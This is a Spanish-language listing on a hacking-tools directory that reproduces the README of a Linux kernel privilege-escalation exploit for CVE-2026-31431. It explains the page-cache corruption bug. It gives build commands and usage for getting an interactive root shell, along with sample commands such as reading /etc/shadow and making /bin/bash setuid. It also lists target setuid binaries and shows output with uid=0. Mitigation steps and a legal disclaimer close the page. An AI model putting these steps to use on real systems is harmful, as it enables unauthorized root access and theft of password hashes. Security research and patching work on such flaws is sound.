Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/h1d3r/copy-fail_lpe_interactive
Escalada de PrivilegiosFrameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónExplotación de Binarios
GitHubh1d3r/copy-fail_lpe_interactive

copy-fail_LPE_Interactive

Exploit para CVE-2026-31431, una vulnerabilidad de corrupción de caché de páginas del kernel de Linux, que proporciona shell root interactivo y ejecución de comandos no interactiva mediante cadenas de AF_ALG y splice().

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de fallo de copia CVE-2026-31431

Herramienta de explotación de vulnerabilidad de contaminación de page cache en el kernel de Linux, con soporte para ejecución de comandos no interactiva.

Resumen de la vulnerabilidad

CVE-2026-31431 es una vulnerabilidad de defecto lógico en el kernel de Linux, presente en la implementación del algoritmo AEAD authencesn. A través de la cadena de llamadas al sistema AF_ALG y splice(), un atacante puede escribir 4 bytes de datos en el page cache de cualquier archivo legible.

Alcance:

  • Kernel de Linux 4.14+ (2017 - abril de 2026)
  • Casi todas las distribuciones principales: Ubuntu, Debian, CentOS, RHEL, Amazon Linux, etc.

Características de la vulnerabilidad:

  • 100% fiable, sin necesidad de condiciones de carrera
  • No requiere cálculo de offsets del kernel
  • El mismo binario funciona en todas las distribuciones
  • No modifica archivos en disco, solo contamina la caché de memoria

Descripción de archivos

root@kitploit:~
.
├── copyfail_universal.c    # Código fuente del POC principal (compilación estática, sin dependencia de libc)
├── copyfail_universal      # Binario compilado
├── run_cmd.sh              # Script wrapper para ejecución no interactiva
├── Makefile                # Script de compilación
└── README.md               # Este documento

Compilación

root@kitploit:~
# Método 1: usar gcc y ld
gcc -c copyfail_universal.c -o copyfail_universal.o -O2 -fno-stack-protector -fno-pic -fno-pie
ld copyfail_universal.o -o copyfail_universal -static -nostdlib
chmod +x copyfail_universal

# Método 2: usar Makefile
make

Uso

Shell root interactivo

root@kitploit:~
./copyfail_universal

Ejecución de comandos no interactiva

root@kitploit:~
# Método 1: usar el script wrapper (recomendado)
./run_cmd.sh "id"
./run_cmd.sh "cat /etc/shadow"
./run_cmd.sh "chmod 4777 /bin/bash"

# Método 2: mediante pipe
echo 'id > /tmp/pwned.txt; exit' | ./copyfail_universal

# Método 3: usar variables de entorno
CMD='whoami' ./copyfail_universal

Especificar otro objetivo setuid

root@kitploit:~
# El objetivo predeterminado es /usr/bin/su
# Se puede especificar otro objetivo modificando la variable path en el código fuente

# Objetivos comunes disponibles:
# /usr/bin/su
# /usr/bin/passwd
# /usr/bin/chsh
# /usr/bin/chfn
# /usr/bin/gpasswd
# /usr/bin/pkexec

Recuperación automática

La vulnerabilidad solo modifica el page cache, no modifica archivos en disco. Ejecute el siguiente comando para recuperarse:

root@kitploit:~
sync; echo 3 > /proc/sys/vm/drop_caches

El script run_cmd.sh ya incluye la función de recuperación automática.

Salida de ejemplo

root@kitploit:~
$ ./run_cmd.sh "id"

[*] CVE-2026-31431 Copy Fail Exploit
[*] Target: /usr/bin/su
[*] Mode: Interactive shell
[*] Payload size: 112 bytes
[*] Corrupting page cache...
[+] Done! Executing su...

uid=0(root) gid=1000(user) groups=1000(user),4(adm),27(sudo)

Programas setuid afectados

ProgramaRutaDisponibilidad
su/usr/bin/su✅ Predeterminado
passwd/usr/bin/passwd✅
chsh/usr/bin/chsh✅
chfn/usr/bin/chfn✅
gpasswd/usr/bin/gpasswd✅
pkexec/usr/bin/pkexec✅
mount/bin/mount✅
umount/bin/umount✅

Buscar todos los programas setuid en el sistema:

root@kitploit:~
find / -perm -4000 -user root -type f 2>/dev/null

Recomendaciones de corrección

  1. Actualizar el kernel - Actualizar a una versión del kernel que incluya el parche a664bf3d603d

  2. Mitigación temporal - Deshabilitar el módulo algif_aead:

    root@kitploit:~
    echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
    rmmod algif_aead 2>/dev/null || true
    
  3. Entornos de contenedores - Usar seccomp para bloquear la creación de sockets AF_ALG

Detalles técnicos

  • Tipo de vulnerabilidad: Escritura fuera de límites en page cache
  • Causa raíz: authencesn usa el búfer de destino como almacenamiento temporal, escribiendo 4 bytes fuera de los límites
  • Método de explotación: Pasar páginas del page cache al subsistema crypto mediante splice()
  • Capacidad de escritura: Puede escribir 4 bytes en el page cache de cualquier archivo legible por operación

Aviso legal

Esta herramienta está destinada únicamente a investigación de seguridad y pruebas autorizadas. El uso de esta herramienta para atacar sistemas no autorizados es ilegal. El usuario es el único responsable de todas las consecuencias legales.

Referencias

  • CVE-2026-31431 Write-up
  • Xint Blog - Copy Fail
  • GitHub - POC oficial
Descargar herramienta